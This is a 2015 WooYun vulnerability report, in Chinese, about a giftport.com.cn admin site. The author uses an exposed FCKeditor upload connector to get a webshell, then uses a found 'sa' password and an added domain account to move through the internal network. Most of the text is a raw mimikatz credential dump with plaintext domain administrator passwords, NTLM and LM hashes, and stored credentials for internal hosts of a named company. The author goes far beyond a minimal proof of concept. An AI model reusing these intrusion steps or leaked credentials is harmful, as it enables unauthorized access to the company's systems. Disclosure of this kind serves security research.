当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142643

漏洞标题:手礼网某站任意上传导致getshell(成功漫游内网)

相关厂商:shouliwang.com

漏洞作者: mango

提交时间:2015-09-21 23:02

修复时间:2015-11-06 11:06

公开时间:2015-11-06 11:06

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-21: 细节已通知厂商并且等待厂商处理中
2015-09-22: 厂商已经确认,细节仅向厂商公开
2015-10-02: 细节向核心白帽子及相关领域专家公开
2015-10-12: 细节向普通白帽子公开
2015-10-22: 细节向实习白帽子公开
2015-11-06: 细节向公众公开

简要描述:

~~ ~~~几个月过去了 我来看看你们的安全

详细说明:

http://admin.giftport.com.cn/fckeditor/editor/filemanager/browser/default/connectors/test.html fckeditor编辑器问题 任意上传文件

N7BSJ5LG}P}}G%`OCERYRRQ.png


SZQ)%$T]R)K(@P`(ZDD@108.png


拿到shell 发现很早就有人拿到shell

]5Q]1P9NZXZ)H1W_9LX0@T9.png


往下翻发现一些铭感数据

XQE$R5`IA)S{738I6LMJF72.png


还有某邮箱账户

34669}2]]I0NW5_PLD5ASB1.png


貌似不用了

漏洞证明:

因为这台服务器死活无法提权成功 只好从别的下手 找到sa密码然后连接 进行提权
192.168.5.96
mango1 密码 qwe!@#123

UCN$YC@Q5H1]_0DN%AK8Q(4.png


开启代理 连接sa提权的服务器

IMG_1651.JPG


成功上服务器
然后抓取服务器密码

Using 'mimikatz.log' for logfile : OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 74 ; 1605863264 (0000004a:5fb78760)
Session           : RemoteInteractive from 1
User Name         : administrator
Domain            : GPDB
Logon Server      : ANP_BK
Logon Time        : 11/27/2014 3:52:59 PM
SID               : S-1-5-21-484940898-303005728-826582926-500
	msv :	
	 [00000002] Primary
	 * Username : Administrator
	 * Domain   : GPDB
	 * LM       : 4147b5822bc9e43ba4f35a970d67b820
	 * NTLM     : 83cca0e36e3d75795ee3e21743ed8579
	 * SHA1     : 32ff18d48dcc112fe7328d0da3986bd1f7d0386c
	wdigest :	
	 * Username : Administrator
	 * Domain   : GPDB
	 * Password : Hong0212slwxdb
	kerberos :	
	 * Username : administrator
	 * Domain   : GPDB.ORG
	 * Password : (null)
	ssp :	
	 [00000000]
	 * Username : administrator
	 * Domain   : ANP_AP2
	 * Password : WxSl!anport
	credman :	
	 [00000000]
	 * Username : ANP_AP2\administrator
	 * Domain   : 192.168.5.82
	 * Password : zzxwzlgq!26
	 [00000001]
	 * Username : ANP_AP1\administrator
	 * Domain   : 192.168.5.81
	 * Password : zzxwzlgq!26
Authentication Id : 0 ; 2206333688 (00000000:8381faf8)
Session           : Interactive from 0
User Name         : Administrator
Domain            : GPDB
Logon Server      : ANP_BK
Logon Time        : 1/4/2012 4:01:34 PM
SID               : S-1-5-21-484940898-303005728-826582926-500
	msv :	
	 [00000002] Primary
	 * Username : Administrator
	 * Domain   : GPDB
	 * LM       : 4147b5822bc9e43ba4f35a970d67b820
	 * NTLM     : 83cca0e36e3d75795ee3e21743ed8579
	 * SHA1     : 32ff18d48dcc112fe7328d0da3986bd1f7d0386c
	wdigest :	
	 * Username : Administrator
	 * Domain   : GPDB
	 * Password : Hong0212slwxdb
	kerberos :	
	 * Username : Administrator
	 * Domain   : GPDB.ORG
	 * Password : (null)
	ssp :	
	 [00000000]
	 * Username : administrator
	 * Domain   : ANP_AP2
	 * Password : WxSl!anport
	 [00000001]
	 * Username : administrator
	 * Domain   : ANP_AP1
	 * Password : WxSl!anport
	credman :	
	 [00000000]
	 * Username : ANP_AP2\administrator
	 * Domain   : 192.168.5.82
	 * Password : zzxwzlgq!26
	 [00000001]
	 * Username : ANP_AP1\administrator
	 * Domain   : 192.168.5.81
	 * Password : zzxwzlgq!26
Authentication Id : 96 ; 2810703969 (00000060:a787f061)
Session           : NetworkCleartext from 0
User Name         : IUSR_ANP_BK
Domain            : GPDB
Logon Server      : ANP_BK
Logon Time        : 9/21/2015 3:54:10 AM
SID               : S-1-5-21-484940898-303005728-826582926-1610
	msv :	
	 [00000002] Primary
	 * Username : IUSR_ANP_BK
	 * Domain   : GPDB
	 * LM       : a607db9a3e0c40edd3ef3ccbc804f895
	 * NTLM     : d3f1ddb1aa8a8448e569a47249dc1ab6
	 * SHA1     : 81ab16f613eda01bdc07ef1c66a7d4aad4a6bd8a
	wdigest :	
	 * Username : IUSR_ANP_BK
	 * Domain   : GPDB
	 * Password : W84:,(QU#862r2
	kerberos :	
	 * Username : IUSR_ANP_BK
	 * Domain   : GPDB.ORG
	 * Password : (null)
	ssp :	
	credman :	
Authentication Id : 0 ; 63747 (00000000:0000f903)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 12/24/2011 1:51:48 PM
SID               : 
	msv :	
	 [00000002] Primary
	 * Username : ANP_BK$
	 * Domain   : GPDB
	 * NTLM     : 7abd26de291214877bdcdb997b8fddff
	 * SHA1     : 27231c7820b00f08d197d5414d48951042b2a078
	wdigest :	
	kerberos :	
	ssp :	
	credman :	
Authentication Id : 0 ; 1334317644 (00000000:4f88124c)
Session           : RemoteInteractive from 1
User Name         : Administrator
Domain            : GPDB
Logon Server      : ANP_BK
Logon Time        : 12/31/2011 12:34:10 PM
SID               : S-1-5-21-484940898-303005728-826582926-500
	msv :	
	 [00000002] Primary
	 * Username : Administrator
	 * Domain   : GPDB
	 * LM       : 4147b5822bc9e43ba4f35a970d67b820
	 * NTLM     : 83cca0e36e3d75795ee3e21743ed8579
	 * SHA1     : 32ff18d48dcc112fe7328d0da3986bd1f7d0386c
	wdigest :	
	 * Username : Administrator
	 * Domain   : GPDB
	 * Password : Hong0212slwxdb
	kerberos :	
	 * Username : Administrator
	 * Domain   : GPDB.ORG
	 * Password : Hong0212slwxdb
	ssp :	
	credman :	
	 [00000000]
	 * Username : ANP_AP2\administrator
	 * Domain   : 192.168.5.82
	 * Password : zzxwzlgq!26
	 [00000001]
	 * Username : ANP_AP1\administrator
	 * Domain   : 192.168.5.81
	 * Password : zzxwzlgq!26
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : NETWORK SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 12/24/2011 1:51:49 PM
SID               : S-1-5-20
	msv :	
	 [00000002] Primary
	 * Username : ANP_BK$
	 * Domain   : GPDB
	 * NTLM     : 7abd26de291214877bdcdb997b8fddff
	 * SHA1     : 27231c7820b00f08d197d5414d48951042b2a078
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : 47 dc d4 ce 08 2e 8c 1a 3e 36 9a c0 d1 e3 c4 79 ba ff e7 31 25 53 46 03 16 2d 44 7b 
	kerberos :	
	 * Username : anp_bk$
	 * Domain   : GPDB.ORG
	 * Password : (null)
	ssp :	
	credman :	
Authentication Id : 96 ; 3028880533 (00000060:b4890c95)
Session           : RemoteInteractive from 4
User Name         : mango1
Domain            : GPDB
Logon Server      : ANP_BK
Logon Time        : 9/21/2015 7:12:54 PM
SID               : S-1-5-21-484940898-303005728-826582926-1641
	msv :	
	 [00000002] Primary
	 * Username : mango1
	 * Domain   : GPDB
	 * LM       : 487b7dc1471b2a78b75e0c8d76954a50
	 * NTLM     : 2de5cd0f15d1c070851d1044e1d95c90
	 * SHA1     : 134fb9c7133a65718b2ab44498d788b8afc1b0f4
	wdigest :	
	 * Username : mango1
	 * Domain   : GPDB
	 * Password : qwe!@#123
	kerberos :	
	 * Username : mango1
	 * Domain   : GPDB.ORG
	 * Password : (null)
	ssp :	
	credman :	
Authentication Id : 96 ; 3027384365 (00000060:b472382d)
Session           : NetworkCleartext from 0
User Name         : IUSR_ANP_BK
Domain            : GPDB
Logon Server      : ANP_BK
Logon Time        : 9/21/2015 7:04:04 PM
SID               : S-1-5-21-484940898-303005728-826582926-1610
	msv :	
	 [00000002] Primary
	 * Username : IUSR_ANP_BK
	 * Domain   : GPDB
	 * LM       : a607db9a3e0c40edd3ef3ccbc804f895
	 * NTLM     : d3f1ddb1aa8a8448e569a47249dc1ab6
	 * SHA1     : 81ab16f613eda01bdc07ef1c66a7d4aad4a6bd8a
	wdigest :	
	 * Username : IUSR_ANP_BK
	 * Domain   : GPDB
	 * Password : W84:,(QU#862r2
	kerberos :	
	 * Username : IUSR_ANP_BK
	 * Domain   : GPDB.ORG
	 * Password : (null)
	ssp :	
	credman :	
Authentication Id : 96 ; 2897153493 (00000060:acaf0dd5)
Session           : NetworkCleartext from 0
User Name         : IUSR_ANP_BK
Domain            : GPDB
Logon Server      : ANP_BK
Logon Time        : 9/21/2015 9:07:04 AM
SID               : S-1-5-21-484940898-303005728-826582926-1610
	msv :	
	 [00000002] Primary
	 * Username : IUSR_ANP_BK
	 * Domain   : GPDB
	 * LM       : a607db9a3e0c40edd3ef3ccbc804f895
	 * NTLM     : d3f1ddb1aa8a8448e569a47249dc1ab6
	 * SHA1     : 81ab16f613eda01bdc07ef1c66a7d4aad4a6bd8a
	wdigest :	
	 * Username : IUSR_ANP_BK
	 * Domain   : GPDB
	 * Password : W84:,(QU#862r2
	kerberos :	
	 * Username : IUSR_ANP_BK
	 * Domain   : GPDB.ORG
	 * Password : (null)
	ssp :	
	credman :	
Authentication Id : 96 ; 2893792061 (00000060:ac7bc33d)
Session           : NetworkCleartext from 0
User Name         : IUSR_ANP_BK
Domain            : GPDB
Logon Server      : ANP_BK
Logon Time        : 9/21/2015 8:55:31 AM
SID               : S-1-5-21-484940898-303005728-826582926-1610
	msv :	
	 [00000002] Primary
	 * Username : IUSR_ANP_BK
	 * Domain   : GPDB
	 * LM       : a607db9a3e0c40edd3ef3ccbc804f895
	 * NTLM     : d3f1ddb1aa8a8448e569a47249dc1ab6
	 * SHA1     : 81ab16f613eda01bdc07ef1c66a7d4aad4a6bd8a
	wdigest :	
	 * Username : IUSR_ANP_BK
	 * Domain   : GPDB
	 * Password : W84:,(QU#862r2
	kerberos :	
	 * Username : IUSR_ANP_BK
	 * Domain   : GPDB.ORG
	 * Password : (null)
	ssp :	
	credman :	
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 12/24/2011 1:51:52 PM
SID               : S-1-5-19
	msv :	
	wdigest :	
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	
Authentication Id : 69 ; 2669405182 (00000045:9f1be3fe)
Session           : RemoteInteractive from 1
User Name         : administrator
Domain            : GPDB
Logon Server      : ANP_BK
Logon Time        : 9/29/2014 9:48:07 AM
SID               : S-1-5-21-484940898-303005728-826582926-500
	msv :	
	 [00000002] Primary
	 * Username : Administrator
	 * Domain   : GPDB
	 * LM       : 4147b5822bc9e43ba4f35a970d67b820
	 * NTLM     : 83cca0e36e3d75795ee3e21743ed8579
	 * SHA1     : 32ff18d48dcc112fe7328d0da3986bd1f7d0386c
	wdigest :	
	 * Username : Administrator
	 * Domain   : GPDB
	 * Password : Hong0212slwxdb
	kerberos :	
	 * Username : administrator
	 * Domain   : GPDB.ORG
	 * Password : Hong0212slwxdb
	ssp :	
	credman :	
	 [00000000]
	 * Username : ANP_AP2\administrator
	 * Domain   : 192.168.5.82
	 * Password : zzxwzlgq!26
	 [00000001]
	 * Username : ANP_AP1\administrator
	 * Domain   : 192.168.5.81
	 * Password : zzxwzlgq!26
Authentication Id : 96 ; 3021367799 (00000060:b41669f7)
Session           : RemoteInteractive from 6
User Name         : mango1
Domain            : GPDB
Logon Server      : ANP_BK
Logon Time        : 9/21/2015 6:29:28 PM
SID               : S-1-5-21-484940898-303005728-826582926-1641
	msv :	
	 [00000002] Primary
	 * Username : mango1
	 * Domain   : GPDB
	 * LM       : 487b7dc1471b2a78b75e0c8d76954a50
	 * NTLM     : 2de5cd0f15d1c070851d1044e1d95c90
	 * SHA1     : 134fb9c7133a65718b2ab44498d788b8afc1b0f4
	wdigest :	
	 * Username : mango1
	 * Domain   : GPDB
	 * Password : qwe!@#123
	kerberos :	
	 * Username : mango1
	 * Domain   : GPDB.ORG
	 * Password : (null)
	ssp :	
	credman :	
Authentication Id : 96 ; 1375163407 (00000060:51f7540f)
Session           : NetworkCleartext from 0
User Name         : IUSR_ANP_BK
Domain            : GPDB
Logon Server      : ANP_BK
Logon Time        : 9/16/2015 4:46:46 AM
SID               : S-1-5-21-484940898-303005728-826582926-1610
	msv :	
	 [00000002] Primary
	 * Username : IUSR_ANP_BK
	 * Domain   : GPDB
	 * LM       : a607db9a3e0c40edd3ef3ccbc804f895
	 * NTLM     : d3f1ddb1aa8a8448e569a47249dc1ab6
	 * SHA1     : 81ab16f613eda01bdc07ef1c66a7d4aad4a6bd8a
	wdigest :	
	 * Username : IUSR_ANP_BK
	 * Domain   : GPDB
	 * Password : W84:,(QU#862r2
	kerberos :	
	 * Username : IUSR_ANP_BK
	 * Domain   : GPDB.ORG
	 * Password : (null)
	ssp :	
	credman :	
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : ANP_BK$
Domain            : GPDB
Logon Server      : (null)
Logon Time        : 12/24/2011 1:51:48 PM
SID               : S-1-5-18
	msv :	
	wdigest :	
	 * Username : ANP_BK$
	 * Domain   : GPDB
	 * Password : 47 dc d4 ce 08 2e 8c 1a 3e 36 9a c0 d1 e3 c4 79 ba ff e7 31 25 53 46 03 16 2d 44 7b 
	kerberos :	
	 * Username : anp_bk$
	 * Domain   : GPDB.ORG
	 * Password : (null)
	ssp :	
	credman :	
mimikatz #


尝试是否为通用密码 然而 并不是
但是 通过观察我发现!我添加的帐号mango1 尽然是域账号!!!!!
那么 所有域服务器都可以登录陆!!!
192.168.5.64
然后登录上去发现~~原来是之前shell的那个站点呀 bbs也在上面呢~~~

IMG_1653.JPG


IMG_1654.JPG


ILD7}BT)Z29XVU4YMT9V]Y3.png


修复方案:

~~~加强服务器管理~

版权声明:转载请注明来源 mango@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-22 11:05

厂商回复:

已修复

最新状态:

暂无

漏洞评价:

评论